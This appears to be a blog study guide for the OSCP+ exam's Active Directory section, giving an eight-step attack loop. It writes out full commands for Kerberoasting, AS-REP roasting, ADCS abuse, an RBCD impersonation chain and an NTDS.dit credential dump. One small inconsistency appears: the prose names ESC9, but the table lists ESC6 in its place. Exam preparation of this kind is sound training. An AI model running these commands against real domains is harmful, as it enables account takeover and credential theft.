OSCP+ AD methodology: what changed since 2024

The "spray creds and hope" days are over. After the November 2024 refresh, the OSCP+ AD set is now structurally identical to a real internal engagement. Here's the playbook I use, in the order I run it.

What actually changed in the 2024 refresh

OffSec's official line is that the rebrand to "OSCP+" reflects "evolving real-world penetration testing." In practice, three things changed about the AD section that you need to take seriously:

Active Directory is no longer optional. The 40-point AD set is now mandatory; you can't pass on standalone machines alone like the old format allowed.
Bonus points are gone for lab grinding only - there's now a renewal cycle every 3 years that rewards continuous practice.
The AD chain is more realistic. Expect Kerberoast, AS-REP, and ACL abuse to feature; expect at least one misconfigured ADCS template; expect at least one constrained delegation pivot.

You're not memorising tricks anymore. You're running a process.

The process, in order

Every AD set I've solved (lab + retake + my own homelab) has fallen to the same eight-step loop. I run it in this exact order, with a checkbox per step. If you skip ahead and the easy stuff is missing, you'll spend an hour debugging a hard exploit that wasn't necessary.

Step 1 · Foothold confirmed → enumerate as user

You've already popped a box and have credentials for a user. Don't open BloodHound yet. Run these first:

$ nxc smb DC01 -u user -p 'Pass' --shares
$ nxc smb DC01 -u user -p 'Pass' --pass-pol
$ nxc smb DC01 -u user -p 'Pass' --users
$ nxc smb DC01 -u user -p 'Pass' --groups
$ nxc ldap DC01 -u user -p 'Pass' --asreproast asrep.txt
$ nxc ldap DC01 -u user -p 'Pass' --kerberoasting kerb.txt

You now know the password policy (do not lock out accounts during a spray), the user list, the group list, and you've already collected every kerberoastable / AS-REP-roastable hash in a single shot.

Step 2 · Crack everything you can, in parallel

$ hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule &
$ hashcat -m 13100 kerb.txt rockyou.txt -r best64.rule &
$ wait

While they crack, move on to step 3 - don't sit idle.

Step 3 · BloodHound (collect now, analyse later)

$ bloodhound-python -u user -p 'Pass' -d corp.local \
    -ns 10.10.10.10 -c All --zip
$ cp *.zip ~/bloodhound/import/

While BloodHound ingests, scope the four queries that matter on day one:

Shortest path from owned to Domain Admin
Find all Kerberoastable users
Find all AS-REP roastable users
List all certificate templates with vulnerable enrollment ACLs (use the BloodHound CE custom queries, or run certipy find on the side)

Step 4 · ADCS sweep

$ certipy find -u user -p 'Pass' -dc-ip 10.10.10.10 -vulnerable -stdout

If you see any of ESC1, ESC2, ESC3, ESC4, ESC8, ESC9 - stop everything else. ADCS misconfigurations are the fastest path to DA on the exam when present. Memorise the matrix:

Misconfig	What it lets you do	Tool
ESC1	Enroll as anyone via SAN	`certipy req --upn admin@corp.local`
ESC2	Any-purpose template & enroll right	Same as ESC1, with EKU bypass
ESC3	Enrollment Agent template	Issue cert on behalf of someone
ESC4	Vulnerable ACL on template	Modify template to ESC1, then exploit
ESC6	EDITF_ATTRIBUTESUBJECTALTNAME2 flag	SAN abuse across all templates
ESC8	NTLM relay to HTTP enrollment	`ntlmrelayx --adcs`

Step 5 · Targeted Kerberoast on high-value SPNs

You already pulled everyone's kerberoast hashes in step 1. Now look in BloodHound for SPNs on accounts in privileged groups (Domain Admins, Account Operators, Server Operators, Backup Operators) and prioritise those crackable hashes first. If there's a SQL_admin or similar service account in a privileged group with a weak password, you usually win there.

Step 6 · ACL abuse (the under-used one)

The exam loves to plant a juicy ACL. Look for:

ForceChangePassword on a target user → reset their password.
WriteOwner / WriteDACL on a group → add yourself to it.
GenericAll / GenericWrite on a computer → Resource-Based Constrained Delegation (RBCD) abuse.
AddSelf on a group → add yourself directly.

# Resource-Based Constrained Delegation (RBCD) - when you have GenericAll on a target machine
$ impacket-addcomputer -computer-name 'fake$' -computer-pass 'P@ss123' \
    -dc-ip 10.10.10.10 'corp.local/user:Pass'

$ impacket-rbcd -delegate-to TARGET\$ -delegate-from 'fake$' \
    -action write -dc-ip 10.10.10.10 'corp.local/user:Pass'

$ impacket-getST -spn cifs/TARGET.corp.local \
    -impersonate Administrator \
    'corp.local/fake$:P@ss123' -dc-ip 10.10.10.10

$ export KRB5CCNAME=Administrator.ccache
$ impacket-psexec -k -no-pass TARGET.corp.local

Step 7 · Lateral movement, in the right order

Default move order I follow once a target is reachable:

nxc smb TARGET -u USER -p PASS - confirm auth works
nxc smb TARGET -u USER -p PASS --shares - any writeable share?
impacket-wmiexec USER:PASS@TARGET - clean execution, less noisy than psexec
evil-winrm -i TARGET -u USER -p PASS - if WinRM is open, prefer this
impacket-psexec USER:PASS@TARGET - last resort, drops a service

Step 8 · DA → krbtgt → cleanup

Once you have a DA hash, dump NTDS.dit:

$ impacket-secretsdump -hashes :HASH 'corp.local/admin@DC01'

Save the output. Take screenshots of the whoami /priv on the DC, of the krbtgt hash entry, and of the proof.txt in Administrator's desktop. That's how you score the AD set.

Pre-exam checklist

Have nxc, impacket-*, certipy, bloodhound-python, evil-winrm installed and pinned to known-working versions.
Have rockyou.txt + best64.rule unzipped and tested.
Print this checklist. Tape it next to the monitor.
Take a 90-minute break the day before. Sleep is worth more than another box.

Closing thought

The 2024 refresh moved the OSCP+ AD set from "obscure trick" to "real methodology". That's good for the cert and good for you - what you learn transfers directly to engagements. Run the loop above on every box you touch until your fingers know it. The exam is just one more box.

← All writeups

OSCP+Active DirectoryBloodHoundMethodology

OSCP+ AD methodology: what changed since the 2024 refresh